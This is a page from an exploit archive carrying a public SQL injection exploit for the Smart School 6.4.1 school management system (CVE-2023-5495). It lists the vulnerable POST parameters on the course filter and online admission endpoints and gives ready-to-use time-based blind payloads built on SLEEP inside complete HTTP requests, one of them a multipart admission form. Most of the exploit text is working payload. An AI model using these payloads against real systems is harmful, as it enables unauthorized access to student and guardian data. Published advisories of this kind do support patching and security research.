Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[12] Download[13]
# Exploit Title: Smart School 6.4.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /course/filterRecords/
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]
-------------------------------------------
POST /course/filterRecords/ HTTP/1.1
searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3
-------------------------------------------
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
Path: /course/filterRecords/
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi
---
Parameter: searchdata[0][title] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[0][searchfield] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[0][searchvalue] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[1][title] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[1][searchvalue] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---
-------------------------------------------
POST /course/filterRecords/ HTTP/1.1
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
-------------------------------------------
Path: /online_admission
---
Parameter: MULTIPART email ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---
POST Parameter 'email' is vulnerable to SQLi
POST /online_admission HTTP/1.1
-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"
*[SQLi]
-----------------------------320375734131102816923531485385
[-] Done
File Tags
- ActiveX[19] (932)
- Advisory[20] (82,516)
- Arbitrary[21] (16,326)
- BBS[22] (2,859)
- Bypass[23] (1,767)
- CGI[24] (1,029)
- Code Execution[25] (7,350)
- Conference[26] (680)
- Cracker[27] (843)
- CSRF[28] (3,352)
- DoS[29] (23,642)
- Encryption[30] (2,372)
- Exploit[31] (52,172)
- File Inclusion[32] (4,231)
- File Upload[33] (977)
- Firewall[34] (821)
- Info Disclosure[35] (2,798)
- Intrusion Detection[36] (895)
- Java[37] (3,054)
- JavaScript[38] (870)
- Kernel[39] (6,774)
- Local[40] (14,527)
- Magazine[41] (586)
- Overflow[42] (12,788)
- Perl[43] (1,423)
- PHP[44] (5,156)
- Proof of Concept[45] (2,345)
- Protocol[46] (3,628)
- Python[47] (1,546)
- Remote[48] (30,934)
- Root[49] (3,598)
- Rootkit[50] (513)
- Ruby[51] (612)
- Scanner[52] (1,644)
- Security Tool[53] (7,912)
- Shell[54] (3,202)
- Shellcode[55] (1,216)
- Sniffer[56] (896)
- Spoof[57] (2,213)
- SQL Injection[58] (16,424)
- TCP[59] (2,417)
- Trojan[60] (687)
- UDP[61] (896)
- Virus[62] (666)
- Vulnerability[63] (31,937)
- Web[64] (9,738)
- Whitepaper[65] (3,753)
- x86[66] (965)
- XSS[67] (18,014)
- Other[68]
File Archives
- October 2023[69]
- September 2023[70]
- August 2023[71]
- July 2023[72]
- June 2023[73]
- May 2023[74]
- April 2023[75]
- March 2023[76]
- February 2023[77]
- January 2023[78]
- December 2022[79]
- November 2022[80]
- Older[81]
Systems
- AIX[82] (428)
- Apple[83] (2,026)
- BSD[84] (375)
- CentOS[85] (57)
- Cisco[86] (1,925)
- Debian[87] (6,862)
- Fedora[88] (1,692)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,350)
- HPUX[91] (879)
- iOS[92] (358)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (47,003)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (486)
- RedHat[101] (14,016)
- Slackware[102] (941)
- Solaris[103] (1,610)
- SUSE[104] (1,444)
- Ubuntu[105] (8,984)
- UNIX[106] (9,323)
- UnixWare[107] (186)
- Windows[108] (6,592)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]